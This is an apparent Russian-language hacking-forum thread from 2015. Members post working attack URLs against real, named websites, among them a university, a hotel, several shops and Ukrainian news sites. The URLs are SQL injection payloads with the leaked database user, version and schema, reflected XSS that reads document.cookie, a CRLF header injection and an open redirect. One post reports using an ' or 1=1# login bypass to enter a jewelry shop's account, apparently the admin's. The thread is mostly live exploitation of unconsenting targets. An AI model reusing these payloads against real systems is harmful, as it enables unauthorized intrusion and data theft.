Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. SUHAR1K

    SUHAR1K Reservists Of Antichat

    Joined:
    12 May 2015
    Messages:
    70
    Likes Received:
    23
    Reputations:
    11
  2. Rosso

    Rosso New Member

    Joined:
    23 May 2015
    Messages:
    6
    Likes Received:
    3
    Reputations:
    5
    Code:
    http://www.hafen-fotos.de/keyphoto/viewphoto.php?foto=49200703071515.jpg&userhelp=on&helpid=-86 union select 1,concat(0x3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3c623e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database()),3--+

    User: web310@localhost
    Version: 5.1.73
    Database: usr_web310_1
    PR: 3


    Code:
    http://www.innoworks.org/newinno/bios2.php?staff_id=-64 /*!50000union*/ select 1,concat(0x3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3c623e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database()),3,4,5,6,7,8,9,10,11,12,13,14--+


    User: innowork_admin@localhost

    Version: 5.5.41-cll-lve
    Database: innowork_people
    PR: 5


    Code:
    http://www.arndt-sowi.de/webquest/show.php?id=-40' union select concat(0x3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3c623e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database()),2,3,4,5,6,7,8,9,10,11--+

    User: web33@localhost
    Version: 5.5.42
    Database: usr_web33_2
    PR: 3


    Code:
    http://www.solo-musica.de/show.php?id=-4' union select 1,2,3,concat(0x3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3c623e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database()),5--+

    User: dbo354230028@195.20.225.33
    Version: 5.1.73-log
    Database: db354230028
    PR: 3


    Code:
    http://www.lernort-labor.de/events.show.php?ID=-153 union select 1,2,3,4,5,6,concat(0x3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3c623e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+

    User: lerjxdou@localhost
    Version: 4.1.26
    Database: usrdb_lerjxdou
    PR: 6


     
  3. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    46
    Likes Received:
    4
    Reputations:
    7
    Code:
    http://www.leong-leong.com/news.php?id=999999.9+union+all+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5
    5.1.72-REL14.10
    PR:4

    Code:
    https://www.naturesplus.com/sourceoflife/products/productDetail.php?id=999999.9+union+all+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6
    5.1.70-log
    PR:4

    Code:
    http://pharm.buu.ac.th/News_view.php?id=999999.9'+union+all+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7+and+'0'='0

    5.0.45
    PR:4
     
  4. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    247
    Likes Received:
    56
    Reputations:
    31
    SQL-inj:
    Code:
    http://bezgazet.dp.ua/?act=mode&mode=0%22%20AND%20%28SELECT%204782%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a707671%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x717a706a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22ClCs%22%3D%22ClCs
     
  5. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    46
    Likes Received:
    4
    Reputations:
    7
    Code:
    http://www.alternativenergia.hu/wp-content/themes/alternativenergia/tudjmegtobbet.php?catid=85+or+1=9+union+all+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6,7,8--
    PR - 5
    5.5.35-0+wheezy1-log
    вывод в исходном коде
     
  6. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    46
    Likes Received:
    4
    Reputations:
    7
    Вкусности-приятности:)
    Code:
    http://www.phy.iitkgp.ernet.in/physics/home/faculty/home.php?id=1'+union+all+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+and+'0'='0
    5.5.41-0
    PR-5

    Индусы
    Code:
    http://www.delreyhotel.com/travel.php?id=999999.9%20union%20all%20select%201,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17&ids=7

    5.5.42-cll
    PR-3
    Code:
    http://www.sendpoints.cn/newsDetail.php?id=999999.9%20union%20all%20select%201,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12

    5.1.65
    Code:
    http://www.donaldsoneducation.com/store.php?catid=999999.9%20union%20all%20select%201,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4

    5.0.96-log
    PR-3

    Code:
    http://www.gunnars.com/product_grids.php?function=indoor'+and(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,user(),0x217e21,version(),0x217e21,database()))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+and+'1'='1
    
    5.5.30

    PR-5
    Code:
    http://www.pollackassociates.com/blog/blogbycategory_new.php?catid=(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,version(),0x217e21))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)

    5.5.30
    PR-4
    Code:
    http://www.exboyfriendjewelry.com/listings.php?catid=3'+and(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,user(),0x217e21,version(),0x217e21,database()))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+and+'1'='1
    Магазин ювелирных изделий:)
    5.5.41-cll-lve
    PR-3
     
  7. semen6192

    semen6192 New Member

    Joined:
    9 Jun 2015
    Messages:
    24
    Likes Received:
    3
    Reputations:
    2
    В магазине ювелирных изделий(http://www.exboyfriendjewelry.com/index.php), в поле входа пользователей, вписал:
    user name: ' or 1=1#
    password: ' or 1=1 '#
    Зашло под ником: Welcome back ExboyfriendJewelry! походу админ, но точно не знаю.
     
    nikonic likes this.
  8. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    247
    Likes Received:
    56
    Reputations:
    31
    SQL-inj (Blind):
    Code:
    http://rada.te.ua/poll.php?l=2%20AND%203*2*1%3d6%20AND%20913%3d913
     
    KIR@PRO and palec2006 like this.
  9. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    247
    Likes Received:
    56
    Reputations:
    31
    XSS:
    Code:
    http://www.vsesdelki.lviv.ua/offer-i-id-i-409444-%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E-1-o-2-h-urovnevaja.html
    Code:
    http://www.admir.rv.ua/ru-i-classifieds-i-category-i-audio-video-foto-tehnika-i-what-i-1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E-i-where-i-%D0%A0%D0%BE%D0%B2%D0%BD%D0%BE-i-p.html
    Code:
    http://doski.ua/index.php/"><script>alert(document.cookie)</script>
     
    KIR@PRO likes this.
  10. private_static

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    74
    Reputations:
    22
    Code:
    http://www.lizzart.ru/catpg.php?k=1&t=2&id=-1689%20UNION%20ALL%20SELECT%20NULL%2CCURRENT_USER%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
    lizzart_mysql@10.1.55.253
     
  11. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    247
    Likes Received:
    56
    Reputations:
    31
    XSS:
    Code:
    http://inforico.com.ua/my/?mq=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E&st=A
     
  12. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    247
    Likes Received:
    56
    Reputations:
    31
    XSS:
    Code:
    http://don.ua/news/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
     
    nikonic likes this.
  13. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    247
    Likes Received:
    56
    Reputations:
    31
    XSS:
    Code:
    http://agronews.ru/forums/index.php?ACTION=FORUM_SUBSCRIBE&FID=14%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E&PAGE_NAME=list&sessid=69fa9ea1c1f8fa858cb91f13ece82f69
     
    yarbabin likes this.
  14. semen6192

    semen6192 New Member

    Joined:
    9 Jun 2015
    Messages:
    24
    Likes Received:
    3
    Reputations:
    2
    XSS:
    Code:
    http://cvp.cce.cornell.edu/search_results.php?q=%3Cscript%3Ealert%28%27anticat.ru%27%29%3C%2Fscript%3E&x=9&y=9
     
  15. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,789
    Likes Received:
    820
    Reputations:
    856
    Ребят, в целях обучения начинающих пентестеров грамотным определениям - ЖЕЛАТЕЛЬНО (если хотите плюсы) указывать полный тип найденной уязвимости - Blind SQL Injection, Reflected XSS, Arbitrary File Downloading и другие.

    Спасибо за внимание.

    З.Ы. Модерам - прошу закрепить в начале топика.
     
    _________________________
  16. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    133
    Likes Received:
    9
    Reputations:
    1
    Попробую проканать за пионера :)

    SQL-inj:
    Code:
    http://www.organicindia.com/article.php?articleid=57+/*!50000union*/+distinct+select+1,2,version(),4,database()--+-

    Вывод в конце правой колонки.

    ----

    Code:
    http://www.ipicgroup.com/shopping_centre.php?id=-1+/*!50000union*/+distinct+select+1,database(),3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17--+-
     
    #116 EoGeneo, 5 Jul 2015
    Last edited: 5 Jul 2015
  17. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    46
    Likes Received:
    4
    Reputations:
    7
    Брауновский университет — один из наиболее престижных частных университетов США, расположенный в городе Провиденсе, штата Род-Айленд.Седьмой из старейших национальных университетов и один из девяти колониальных колледжей.
    SQL Injection
    Code:
    http://www.brown.edu/Administration/Auxiliary_Housing/php/show.php?TypeID=999999.9+union+all+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)
    5.0.95-log
    PR - 8
    ТИц - 800
    Alexa:9к
    Трафф - 2.6кк в месяц.
     
  18. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    247
    Likes Received:
    56
    Reputations:
    31
    CRLF-inj (Результат отображается в heade'ре).
    Code:
    http://www.notomania.ru/cat_view.php?id=%0d%0a%20SomeCustomInjectedHeader:injected_by_ANTICHAT
     
    joelblack and yarbabin like this.
  19. semen6192

    semen6192 New Member

    Joined:
    9 Jun 2015
    Messages:
    24
    Likes Received:
    3
    Reputations:
    2
    XSS:
    Code:
    http://friendship-bracelets.net/search.php?search_text=%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E
     
  20. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    224
    Likes Received:
    373
    Reputations:
    100
    target: clanwilliam.info
    type: SQL Injection
    current user: `clanwi_1@%`
    version: 5.5.43-0+DEB7U1-LOG
    Code:
    http://www.clanwilliam.info/index.php?id=-1+union+select+1,version(),3,table_name,5,6,7+from+information_schema.tables+limit+0,1+--+;


    target:
    sergiev.ru
    type: Open Redirect
    Code:
    http://www.sergiev.ru/?q=http://ya.ru

     
    #120 joelblack, 6 Jul 2015
    Last edited: 8 Jul 2015
    Filipp likes this.
Loading...